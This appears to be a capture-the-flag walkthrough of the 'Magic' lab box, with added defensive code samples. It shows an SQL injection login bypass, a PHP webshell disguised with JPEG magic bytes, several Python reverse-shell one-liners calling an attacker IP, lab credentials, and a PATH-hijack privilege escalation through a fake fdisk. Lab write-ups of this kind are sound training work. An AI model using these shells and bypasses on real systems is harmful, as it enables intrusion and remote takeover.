HTB Magic - lmiyasato/lenny-hacking GitHub Wiki
-
index.html & index.php show different pages.
SQL injection / PHP login bypass; cheat sheet: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
An SQL injection is a computer attack in which malicious code is embedded in a poorly-designed application and then passed to the backend database. The malicious data then produces database query results or actions that should never have been executed.
Because of operator precedence, the AND condition is evaluated first and the OR afterwards, which makes the WHERE clause true; in fact it is true for every row of the users table. The supplied username is therefore ignored and the attacker is logged in as the first user in the users table, so no username needs to be known in advance: the query finds one. An attacker can also steer which account the login lands on. In this case the injected input makes the clause compare username = 'admin' OR '1'='1'.
Login page: http://10.10.10.185/login.php
admin' or '1'='1
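As an added illustration (not part of the original writeup), the same bypass string run against a constructed SQLite login table: the concatenated query returns the first row because AND binds tighter than OR, while the parameterised query treats the whole string as data.

```python
"""Login query built by string concatenation vs. a parameterised query."""
import sqlite3

PAYLOAD = "admin' or '1'='1"      # the bypass string used on the login page


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the site's login table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO login VALUES (1, 'admin', 'placeholder-password')")
    return db


def build_vulnerable_sql(username: str, password: str) -> str:
    """The query text a PHP-style string concatenation produces."""
    return ("SELECT username FROM login WHERE username='" + username
            + "' AND password='" + password + "'")


def vulnerable_login(db, username, password):
    """Quotes in the input are spliced into the SQL, so or '1'='1' becomes a
    condition. AND binds tighter than OR, so the clause is true for every row
    and the first user comes back regardless of the supplied username."""
    row = db.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    """Bound parameters: the same string is compared literally and matches nothing."""
    row = db.execute("SELECT username FROM login WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None
```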
-
Upload a shell (but the upload filter has to be bypassed first).
Microsoft's 10 immutable laws of security: https://www.fluidnets.com/2016/03/microsoft-s-ten-immutable-laws-of-security-version-2-0/ Law #4: If you allow a bad guy to run active content in your website, it's not your website any more.
Demo order: load the PHP file without a magic number, then the legitimate dog.jpg, then the PHP file with the magic number.
webshells overview: https://en.wikipedia.org/wiki/Web_shell
Magic Number / file signatures overview: https://en.wikipedia.org/wiki/List_of_file_signatures
A webshell allows a user to access a remote computer via the World Wide Web using a web browser on any type of system, whether it's a desktop computer or a mobile phone with a web browser, and perform tasks on the remote system. No command-line environment is required on either the host or the client.
Show the tweaked PHP reverse shell in a hex editor: the JPEG magic number “FF D8 FF DB” is added as the first 4 bytes of the file using the hex editor.
Right-click on the image in the library to get the URL of the shell.
http://10.10.10.185/images/uploads/malicious.php.jpeg
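Added example, not from the original writeup: an upload check run over two constructed files, a minimal real JPEG and a PHP placeholder with FF D8 FF DB prepended. It shows why a magic-bytes-only filter accepts the second file, and what a stricter check (single allowed extension, no PHP tag, consistent JPEG segment structure) rejects.

```python
"""Upload check showing why a magic-number-only filter is not enough."""
import re

JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED_EXT = {"jpg", "jpeg"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# Constructed samples: a minimal valid JPEG (SOI, APP0/JFIF, EOI) and a PHP
# placeholder with the FF D8 FF DB bytes prepended, as in the writeup.
GOOD_JPEG = (b"\xff\xd8" + b"\xff\xe0\x00\x10"
             + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9")
FAKE_JPEG = b"\xff\xd8\xff\xdb" + b"<?php /* constructed placeholder, no payload */ ?>"


def naive_accepts(data: bytes) -> bool:
    """The weak check: only the leading bytes are inspected."""
    return data.startswith(JPEG_MAGIC)


def jpeg_segments_ok(data: bytes) -> bool:
    """Walk marker segments from SOI; every length must fit inside the file and
    the walk must reach SOS or EOI. Text pasted after the magic fails this."""
    if not data.startswith(b"\xff\xd8"):
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):           # EOI or SOS reached consistently
            return True
        if pos + 4 > len(data):
            return False
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            return False
        pos += 2 + length
    return False


def hardened_check(filename: str, data: bytes) -> str:
    """Return 'ok' or the reason the upload is rejected. A real deployment would
    also store the file under a server-chosen name in a directory where the web
    server never executes scripts."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        return "bad-filename"            # rejects double extensions like x.php.jpeg
    if not data.startswith(JPEG_MAGIC):
        return "bad-magic"
    if PHP_TAG.search(data):
        return "php-tag-in-image"
    if not jpeg_segments_ok(data):
        return "malformed-jpeg"
    return "ok"
```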
Got foothold. Listener: sudo nc -nvlp 666
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
• If disconnected, need to re-load php file?
- Get User.
Found some MySQL creds (enumerate the db.php5 file): $ cat /var/www/Magic/db.php5
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
Since the mysql client does not work on the target, set up an SSH reverse forward from the target back to Kali.
Create the SSH key on the target:
ssh-keygen
Add id_rsa.pub to the authorized_keys file (on the Kali host, see next step).
This new public key needs to be added to our Kali host's authorized_keys file for the kali user, but with some restrictions. To avoid potential security issues we tighten the SSH configuration so that access is only permitted from the WordPress (here, the Magic web server) IP address (note that this will be the NAT IP, since that is what Kali sees, not the IP of the actual host).
Next, we want to ignore any commands the user supplies. This can be done with the command option in authorized_keys. We also want to prevent agent and X11 forwarding with the no-agent-forwarding and no-X11-forwarding options.
This entry allows the owner of the private key (the web server) to log in to our Kali machine but prevents them from running commands and only allows port forwarding.
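The restricted authorized_keys entry described above, written out as an added example (not from the original page). The IP and the key body are placeholders; the command= value only prints a message if a shell is ever requested, and no-pty removes the terminal as well:

```text
from="<WEB-SERVER-NAT-IP>",command="echo 'port forwarding only'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAA...PLACEHOLDER-PUBLIC-KEY... tunnel-key
```

With the client connecting using -N no session is requested, so the forced command never runs and the -R forwards are still honoured; on OpenSSH 7.2 or later the `restrict` option followed by `port-forwarding` expresses the same intent more tightly.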
ssh -f -N -R 1122:10.10.10.185:22 -R 13306:127.0.0.1:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking"=no -i /tmp/id_rsa [email protected]
*Note: 127.0.0.1 is used because the forwarded port connects to the loopback interface on the target.
ps -ef | grep root
cat /var/log/auth.log | grep theseus
cat /var/log/auth.log | grep -v root
netstat -plant
- MySql Database Abuse
Log into the target MySQL db:
mysql --host=127.0.0.1 --port=13306 --user=theseus -p
show databases;
use Magic;
MySQL [Magic]> show tables;
MySQL [Magic]> select * from login;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+----+----------+----------------+
This will get you theseus / the user flag:
Upgrade the shell (use the Python shell one-liner). As you get into this kind of work, some shells are not stable, not to mention the dreadful feeling when a shell is lost because you run a bad command that hangs and hit “Ctrl-C” thinking it will stop it, but it instead kills the entire connection. Reference: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
su to theseus
- Privilege Escalation / Process snooping / Search path abuse
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
Show the pre-compiled linpeas output: -rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo. The setuid bit (s) with owner root means the command runs as root even though it is launched with the user's privileges.
wget the pspy tool (simulating the linpeas output, for time reasons and to avoid breaking the shell). pspy is a command-line tool designed to snoop on processes without needing root permissions. It lets you see commands run by other users, cron jobs, etc. as they execute, and is great for enumeration of Linux systems in CTFs.
Create a second theseus shell on port 778 to run pspy:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Abusing search orders
Having ‘.’ in your PATH means that binaries and scripts in the current directory can be executed by name. To avoid typing ./ before each command, some users add ‘.’ to their PATH. This can be an excellent method for an attacker to escalate privileges.
The sysinfo command runs as root and in turn runs other commands such as fdisk.
Once logged in as theseus, wget a script containing the Python shell one-liner, name it fdisk and put it in /tmp:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Modify the search order so that /tmp is looked up first, and make the script executable:
export PATH=/tmp:$PATH
chmod +x /tmp/fdisk
Rerun the sysinfo command.
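Added example, not from the original writeup: a small Python check of the search-order problem above. It builds a constructed layout with two executables named fdisk, shows that putting a world-writable directory first in PATH changes which one resolves, and lists the PATH entries a normal user could write to. The remediation is in the comments: a privileged program should call helpers by absolute path or with a fixed PATH.

```python
"""PATH search-order check: which 'fdisk' a privileged program would pick up,
and which PATH entries an unprivileged user could drop a binary into."""
import os
import stat
import tempfile
from typing import Dict, List, Optional


def resolve(cmd: str, path: str) -> Optional[str]:
    """First executable named cmd along path, left to right (what a shell does)."""
    for d in path.split(os.pathsep):
        cand = os.path.join(d or ".", cmd)       # an empty entry also means '.'
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def risky_entries(path: str) -> List[str]:
    """Entries that are '.', empty, or world-writable (the real /tmp is mode 1777)."""
    out = []
    for d in path.split(os.pathsep):
        if d in ("", "."):
            out.append(d or "<empty>")
        elif os.path.isdir(d) and os.stat(d).st_mode & stat.S_IWOTH:
            out.append(d)
    return out


def demo() -> Dict[str, object]:
    """Constructed layout: a system-like dir and a world-writable scratch dir,
    each holding an executable named fdisk, to show the effect of PATH order."""
    root = tempfile.mkdtemp()
    sysdir, tmpdir = os.path.join(root, "sbin"), os.path.join(root, "tmp")
    os.mkdir(sysdir, 0o755)
    os.mkdir(tmpdir)
    os.chmod(tmpdir, 0o1777)                     # like the real /tmp
    for d in (sysdir, tmpdir):
        f = os.path.join(d, "fdisk")
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\necho fdisk from %s\n" % d)
        os.chmod(f, 0o755)
    hijacked = tmpdir + os.pathsep + sysdir        # effect of 'export PATH=/tmp:$PATH'
    fixed = sysdir                                 # a setuid program should use a fixed
    return {                                       # PATH or call /sbin/fdisk absolutely
        "hijacked_pick": resolve("fdisk", hijacked),
        "fixed_pick": resolve("fdisk", fixed),
        "tmp_fdisk": os.path.join(tmpdir, "fdisk"),
        "sys_fdisk": os.path.join(sysdir, "fdisk"),
        "risky": risky_entries(hijacked + os.pathsep + "."),
    }
```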